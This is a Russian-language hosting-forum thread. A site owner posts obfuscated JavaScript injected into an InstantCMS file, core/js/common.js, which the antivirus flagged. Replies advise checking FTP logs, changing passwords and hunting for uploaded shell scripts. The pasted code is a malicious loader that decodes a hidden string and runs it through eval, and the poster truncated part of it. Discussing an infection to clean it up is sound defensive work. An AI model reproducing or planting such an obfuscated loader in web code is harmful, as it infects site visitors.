Ругается каспер на js

malquem
На сайте с 14.06.2011
Offline
133
596

Залили вот такой код в директории core/js/common.js (InstantCMS). Как залил я хз. Пароль в FTP клиенте сохраняю. Ща добавил в сервис назамок и смнеил пароль.

var y377ea5="";function h8a10a0762acf(){var s632887d9=String,red9ec24=Array.prototype.slice.call(arguments).join(""),se887e1=red9ec24.substr(7,3)-397,f6ba29112,a48101af;red9ec24=red9ec24.substr(10);var f5b47291d=u1f0b808(red9ec24);for(var y7f3123=0;y7f3123<f5b47291d;y7f3123++){try{throw(p24fbf=red9ec24.substr(y7f3123,1));}catch(e){p24fbf=e;};if(p24fbf=='}'){se887e1="";y7f3123++;c12adcad2=f9b87d(red9ec24,y7f3123);while(c12adcad2!='}'){se887e1+=c12adcad2;y7f3123++;c12adcad2=red9ec24.substr(y7f3123,1);}se887e1-=594;continue;}f6ba29112="";if(h1bf42884(p24fbf)){y7f3123++;p24fbf=red9ec24.substr(y7f3123,1);while(p24fbf!='®'){f6ba29112+=p24fbf;y7f3123++;p24fbf=red9ec24.substr(y7f3123,1);}f6ba29112=f6ba29112-se887e1-23;if(f6ba29112<0)f6ba29112+=256;if(f6ba29112>=192)f6ba29112+=848;else if(f6ba29112==168)f6ba29112=1025;else if(f6ba29112==184)f6ba29112=1105;y377ea5+=s632887d9["\x66\x72\x6fmC\x68arC\x6f\x64\x65"](f6ba29112);continue;}m61e9943=(p24fbf+'')["c\x68\x61\x72C\x6f\x64e\x41t"](0);if(m61e9943>848)m61e9943-=848;a48101af=m61e9943-se887e1-23;a48101af=eac0f89(a48101af);y377ea5+=y22ffd(a48101af);}}h8a10a0762acf("e8","9","d41c","49","8","®16","4","®®","226","®}","6","7","1}","®21","7®}","6","1","9","}","®","15","8®®","1","4","7","®","}70","2}","®","2","47®}7","6","8","}.","43","}66","7}®1","36","®}","65","7}®","127®","v®","20","9®c`_®20","4®®","183®®","2","0","0®","v","®2","0","3","®®20","0","®","}6","0","6}","®1","43®}","6","9","5","}®15","6®","®","1","85","®","}6","8","0","}®1","4","1®","®","14","8","®}67","7}","®","210®}","742}®3","1","®}","6","9","4","}","®239®®","2","3","5","®","®1","81","®","}","6","16}","\\}","77","3","}","®24","9","®}603","}","®","1","3","7","®","®1","32","®","®","14","0®","®13","3®","®131®}710}®","2","50®","®24","8®","®24","8","®","®25","0","®}","73","4}","®17","®}7","63}","3®2","3","8®","}","7","06","}","®","240","®","®2","5","0","®®","1","80","®","}7","49}","®","19","®®2","2","3","®®2","2","®}","69","5}","®","2","25","®","®","2","33","®}73","9","}®2","3®®11","®}","63","8}","®18","1","®","}","6","10}","®13","6","®","}","6","88","}®23","3","®","}","6","1","6}[","®144","®","}6","0","6}®","14","6","®}","72","8","}®","10®}","73","6","}","®2","12","®","}","62","0}®","152®","`}","6","6","4","}®","1","32®}","5","9","8","}","V","}","7","0","6","}®1","4","8®®1","4","5®","®1","44®","}6","7","8}®","2","12","®®","20","9","®}6","3","9","}","dl","®184®","®","1","89","®","®","1","8","0®}709","}®","2","3","9®","}67","7","}","®","2","1","7","®","}","67","9","}®2","10","®}","6","6","4}®125®","®21","2®}684}","®218®","}778","}","=3",">}","665","}®2","13®","®1","40®®2","1","4®","}64","1}","®","1","9","1","®","®192","®","}59","9","}®130®","}774","}","7",",","}622}®154®","}63","2}","]","}","648","}®138®","}609}c","c","F","}","7","3","8","}®2","06","®","®","2","8","®®","21","®}","7","4","8}","®2","1","®®","22","®®2","3","®}764","}","*","/&","}7","12}®2","41®","}6","12","}PRI®","164","®}741}","®1","83","®®1","80®}724","}®","1","62®","}","7","3","8}","®176","®®","30","®}","6","34","}","®1","68","®","}68","8}®22","7","®","}","6","78","}®20","7®}7","35}","®","19®}6","0","0}","®","14","8","®","K®","14","9","®","®150®","®","15","1","®}","6","41","}","®","1","7","2","®}","6","50","}®1","8","7","®®1","7","6","®}","631","}","®1","6","3®\\}67","9","}","®","16","9®","}","673","}","®","1","34®","}","6","9","5","}","®","17","2®}","6","92}®1","8","0®","}","7","17}®","1","59","®","®156®®","1","5","5","®","®1","5®}","745","}®1","87","®}6","48","}","W","V","}","64","7}®176","®}","6","62","}®2","0","2","®}","7","5","2","}","®","24®}","7","02}®24","8®®240®®","232®","®","241®®","2","4","7®®","177","®}","7","3","1","}","®","1","5","®","}59","9","}","®","138","®}","658}","®196®}","6","5","1","}","®19","1","®","®1","97®®1","95","®","®181®}6","1","8","}®15","6®","®158","®","®","1","65","®®1","4","8","®","O","l}","69","0","}®","1","51®","}","71","1","}®2","42®®1®}6","99}","®","2","3","8®®2","2","7®®","24","4","®}","7","8","4","}",">","D}","6","8","1}","®220","®}","638}","k}7","6","0","}","®","2","30","®","}","6","20","}Q®","172","®","}599}",")&}72","6}®16","4","®®","16","4","®®4","®","®","1","®}7","5","2}","®21","3","®®2","2","1®,","}","762}(}","7","2","2}","®","5","®","®","2","5","1","®®","6®","}685","}","®23","3","®®","1","60®}","755","}","0","12","}7","59","}\"}61","2}®","14","9®","®","138","®}728}","®","4","®®","189®","®2","1","8®®2","18","®","}6","5","3}","®143®","}","7","4","7","}®","208","®}","632","}m","}641}","o","f","}707","}®","3®","®1","49®","®","14","6","®}","616}","6","}6","00}&&","®148","®","}68","5}","®","21","9","®®","22","4","®","}","6","5","0","}®1","7","9®","®190®}","6","70}®218","®","}","7","5","0","}®225","®","}776}","E}66","7}","®","2","1","7®®2","18®®1","9","8®","}740}®2","1®}621}®1","4","7","®®1","53","®","R","}","7","2","1","}","®","2","1","1®®","182®","®","19","9®}","616","}","h",":","7","6","}658","}`}680","}v}","7","10","}","®","1","®","}7","12}®238","®","}","6","38","}®","1","81®}

бла бла бла короче много разного
®","219®'®2","7®®","28","®&}600}","K®","14","3","®®","13","0","®}","66","0","}®","186®}","6","22","}®15","1","®","}","63","8}","®","1","8","8®}","705","}","®217®}","6","6","2","}","®","207","®","®","18","8","®®2","0","7®®19","2","®","}68","8","}","®","1","4","9®","}74","0","}","®","23","0®","®2","3","0®","®","2","01®}","6","70}","®1","38®}7","7","1","}","+","}6","07}®1","4","7®}","78","5","}C}","61","0","}®","151®","®147","®","}","6","8","0","}®","2","1","0®}6","63}®","2","0","8®}60","6","}®1","36®","}","636}h}","6","39","}m}7","5","7","}®21","8","®}72","8","}®","24","®}6","7","6","}v","sr}7","8","9}","®","2","2","7","®","®227®","®","2","2","7®","®","2","27","®Q","}","68","9}®","22","3","®","®228®}","671","}®20","0®","®2","1","1®®","2","19®","}7","6","4}®","239®","9","}702}®25","2®®25","3®","®23","3®","}7","75}8-","3}","73","3}®194®","®2","2","3®","}","69","8}","®","1","59","®","®17","7","®®","186®","®","14","0®","}7","8","4","}®","223®}","7","3","2}","®","1","70","®®1","70","®","®","1","7","0®","®1","70","®®30®","®1","7","4®","®1","71","®®1","7","0®}615}5","5®1","6","9®g}6","36","}","NKJ","}6","9","0","}","®128®®12","8","®","®2","3","4®}","694}","®22","2®}","6","24}","®167®","®","1","5","8®®","165®","}","7","7","0};®245","®","}6","92","}","®23","2®","}","67","6}®215","®","}598","}®","1","35®","®","138","®®124®","®12","7","®","}","786","}","®2","4","7®","®20","®","®24","7","®=","}","7","1","8","}","®","8","®","®","1®}","6","0","1}®1","2","9","®}","6","0","2}","®1","47®®","136","®","}","75","9}","+}","7","39}®","22","®","®208","®","}76","5}®235®","}7","0","8","}®","169®®","4®","}6","44}","V}","7","1","1}®150®®","14","9®","®14","9®}79","3}®","2","31","®®231","®}","74","8","}(","®2","6®","®","31®®2","1","®®3","2","®(®","22","3®","}7","6","0","}","5","}","74","1","}","#$}77","7","}4",":/","}6","48}","®18","0®}7","0","9}","®17","0","®","}6","31","}","y","}6","6","2","}","®12","3","®®14","1®}","624","}","p}7","12}®154®®","1","51","®","}","6","6","7}iii","®","22","1","®}","6","0","0}","X*'&","}7","8","3","}®","221","®","®2","2","1","®G7","}","623}®","1","6","6","®}","782}<C","G}7","25}","®2","0","0®","}67","3","}®","2","17","®","®216","®","®2","01","®","®1","3","4","®","®163®","®1","3","4®","®","219","®","®2","16®®","210","®®1","34®","®","1","4","5","®","®","1","34®®17","9","®","®19","9®","®218®}7","92}E","}","751","}","®","22","6®","}6","2","7}","®","170®","}7","2","0","}","®","24","6","®","}6","0","1","}®","1","40","®®","1","3","0®","}","6","54","}®","1","94®}5","96}®","1","34®","A","}","612","}R}6","8","9}","®16","4","®","}","70","9","}","®2","54","®","®","24","9®}672","}","®","18","4®","®","21","7®","®2","15®","}6","4","0","}","®1","74","®","®","17","9","®","®","1","7","2®mns","}","6","6","2","}","®20","6","®®2","08®}684","}","®","211®®228","®","}64","4}®","18","9","®","®","1","8","7®}","642","}","®176®","}","678","}®","2","17®","}","73","7}","®1","3","®®2","0","6","®","}","6","14}","^","}","787}®1","®","}","7","54}","®2","1","5®","}7","2","5}®19","7","®®","18","6®","}","608","}L","S}7","38}","®1","7®","}7","7","2","}<®24","0®®4®","}7","10}","®15","2®}","59","7","}$#}6","60","}b","}7","21}","®1","59®","}","63","0","}","®1","63","®®1","6","0","®}","74","3","}®13®","®1","6","®}60","0}K","®","126","®®14","1®®","14","1®","}6","78","}","®2","08","®","®2","17","®","®2","07","®}","621}u","®1","5","4®","}6","36}","®17","0","®}","7","09","}®","2","46","®","}","6","3","4","}","®","1","6","3®","g}","633}®17","7®","®1","61®}677}®","2","2","0®","®","2","1","1","®","}","7","9","3}NR}6","41","}o®","12","9®S","}","6","5","3","}\\[","[","®","207","®}718}®160®","}7","0","6","}®14","5","®","}67","4}p}688}","®242®","®","1","7","6","®®","13","0","®","®","12","7","®","}6","7","0","}","®22","4®","}698","}","®","16","8®","®1","67","®®1","68","®}70","7}","®","1","95®","");eval(y377ea5);function u1f0b808(s69e6196b){return s69e6196b.length;}function f9b87d(fa3ec22be,v1e4e8fd){return fa3ec22be.substr(v1e4e8fd,1);}function h1bf42884(y3a3626a){return y3a3626a=='®';}function y22ffd(i0052e5){var s632887d9=String;return s632887d9["\x66\x72\x6fmC\x68arC\x6f\x64\x65"](i0052e5);}function eac0f89(b7dab4f16){var kbc85a7=b7dab4f16;if(kbc85a7<0)kbc85a7+=256;if(kbc85a7==168)kbc85a7=1025;else if(kbc85a7==184)kbc85a7=1105;return (kbc85a7>=192 && kbc85a7<256) ? kbc85a7+848 : kbc85a7;}
Все люди - братья, но не все братья - люди.
Den73
На сайте с 26.06.2010
Offline
523
#1

какой смысл топика? тем более не в том разделе.

ежедневно тысячи сайтов заражаются.

если вы хотите узнать происхождение то нужно расследование(

malquem
На сайте с 14.06.2011
Offline
133
#2
Den73:
какой смысл топика? тем более не в том разделе.

ежедневно тысячи сайтов заражаются.

если вы хотите узнать происхождение то нужно расследование(

Может кто нибудь знаком и подскажет. Просто я боюсь то что какая нибудь зараза будет генерить этот код снова и снова.

rustelekom
На сайте с 20.04.2005
Offline
533
#3

Здравствуйте

А почему не в том? Это же раздел хостинга а не только рекламных предложений:)

Возвращаясь к теме - скорее всего у вас украли фтп пароль и получили доступ к вашему аккаунту. Чтобы убедиться в этом, достаточно обратиться к хостеру и попросить дать список ай-пи адресов с которых осуществлялся доступ к фпт и панельке. Если найдутся чужие - значит надо лечить комп, менять все пароли и чинить сайт.

Если же в логах ничего подозрительного не найдется то надо искать шелл скрипты и/или уязвимости в самих скриптах на сайте. Шелл скрипт может быть закачан как картинка в директорию аваторов, иконок или юзерских изображений. И конечно, надо обновлять движки сайтов.

60% скидка на VPS в США, 20% скидка в Нидерландах и 40% в Финляндии. Хостинг, VPS и серверы в США, Нидерландах, Финляндии, Германии и России. RoboVPS https://www.robovps.biz
XLhost.Ru
На сайте с 09.09.2008
Offline
231
#4

Миллион раз на форуме обсуждалось.

Windows / Linux VPS на NVMe от $10 | Dedicated от $60 ( https://xlho.st )

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий